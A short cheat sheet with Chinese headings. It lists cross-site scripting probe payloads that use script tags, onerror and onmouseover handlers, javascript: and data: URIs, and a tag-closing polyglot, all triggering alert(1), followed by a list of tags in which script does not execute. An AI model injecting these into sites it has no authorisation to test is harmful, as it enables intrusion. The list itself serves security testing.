一、XSS payload
<script>alert(1)</script>
'"><Script>alert(1)</Script>
<img/src=@ onerror=alert(1)/>
'"><img/src=@ onerror=alert(1)/>
'onmouseover=alert(1) x='
"onmouseover=alert(1) x="
`onmouseover=alert(1) x=`
javascript:alert(1)//
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
'";alert(1)//
</script><script>alert(1)//
)x:expression(alert(1))
alert(1)//
*/-->'"></iframe></script></style></title></textarea></xmp></noscript></noframes></plaintext><script>alert(1)</script>
二、无法执行XSS的标签
<title></title>
<textarea></textarea>
<xmp></xmp>
<iframe></iframe>
<noscript></noscript>
<plaintext><plaintext>